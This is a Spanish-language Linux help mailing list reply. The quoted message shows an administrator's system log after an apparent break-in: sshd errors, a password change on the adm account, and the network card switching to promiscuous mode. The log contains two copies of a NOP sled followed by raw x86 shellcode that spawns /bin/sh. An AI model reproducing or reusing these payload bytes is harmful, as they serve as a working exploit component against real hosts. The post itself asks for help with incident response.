Mensajes en /var/log/messages

[Gerardo Herrera Tenorio]

que version de redhat estas utilizando?

--------------------------------------------------------------------
Gerardo Herrera Tenorio
Depto. de Seguridad y Redes		Sientase libre, use LINUX!!
TuxneT Proveedor de Internet
--------------------------------------------------------------------
Para algunos es solo un SixPack ..... Para mi es un grupo de apoyo!!

On Mon, 30 Oct 2000, Jose Antonio Galicia wrote:

> 
>  Revisando las bitacoras encontre esto:
> ------------------
> Oct 29 04:54:16 telnet sshd[3911]: Did not receive ident string from 200.53.243.31.
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90>1À1Û1É°FÍ<80>1À1ÛC<89>ÙA°?Í<80>ëk^1À1É<8D>^^A<88>F^Df¹ÿ^A°'Í<80>1À<8D>^^A°=Í<80>1À1Û<8D>^^H<89>C^B1ÉþÉ1À<8D>
> ^^H°^LÍ<80>þÉuó1À<88>F^I<8D>^^H°=Í<80>þ^N°0þÈ<88>F^D1À<88>F^G<89>v^H<89>F^L<89>ó<8D>N^H<8D>V^L°^KÍ<80>1À1Û°^AÍ<80>è<90>ÿ
> ÿÿ0bin0sh1..11
> Oct 29 05:01:15 telnet sshd[3957]: Did not receive ident string from 200.53.243.31.
> Oct 29 05:04:02 telnet PAM_pwdb[3970]: password for (adm/3) changed by ((null)/0)
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90>1À1Û1É°FÍ<80>1À1ÛC<89>ÙA°?Í<80>ëk^1À1É<8D>^^A<88>F^Df¹ÿ^A°'Í<80>1À<8D>^^A°=Í<80>1À1Û<8D>^^H<89>C^B1ÉþÉ1À<8D>
> ^^H°^LÍ<80>þÉuó1À<88>F^I<8D>^^H°=Í<80>þ^N°0þÈ<88>F^D1À<88>F^G<89>v^H<89>F^L<89>ó<8D>N^H<8D>V^L°^KÍ<80>1À1Û°^AÍ<80>è<90>ÿ
> ÿÿ0bin0sh1..11
> Oct 29 05:11:59 telnet PAM_pwdb[3981]: password for (adm/3) changed by ((null)/0)
> Oct 29 05:12:42 telnet kernel: amd uses obsolete (PF_INET,SOCK_PACKET)
> Oct 29 05:12:42 telnet kernel: device eth0 entered promiscuous mode
> ---------------
> 
>  Imaginome un ataque, ¿tipo?
> 
>  Por de mientras ya regrese a modo no promiscuo la tarjeta, mate todo lo
> que se puede matar y busque indicios pero no encuentro nada. La máquina
> estaba nueva así que no pasa de ahí, la reinstalo y se acabo pero quiero
> prevenir. En inet sólo estava FTP. Además estaba prendido ssh, smpt, https
> y nada más.
> 
>  Despues de resetear la máquina el lsof me muestra:
> 
> 	httpd    478 root    4u  IPv4    692       UDP *:1025
> 
>  Dados los síntomas, ¿por donde estan llegando?
> 
>  Saludos,
>  Toño.
> ---
>  mailto: jcgalici en cbbanorte.com.mx
> 
> ---------------------------------------------------------
> para salir de la lista, enviar un mensaje con las palabras
> "unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx
> 

---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx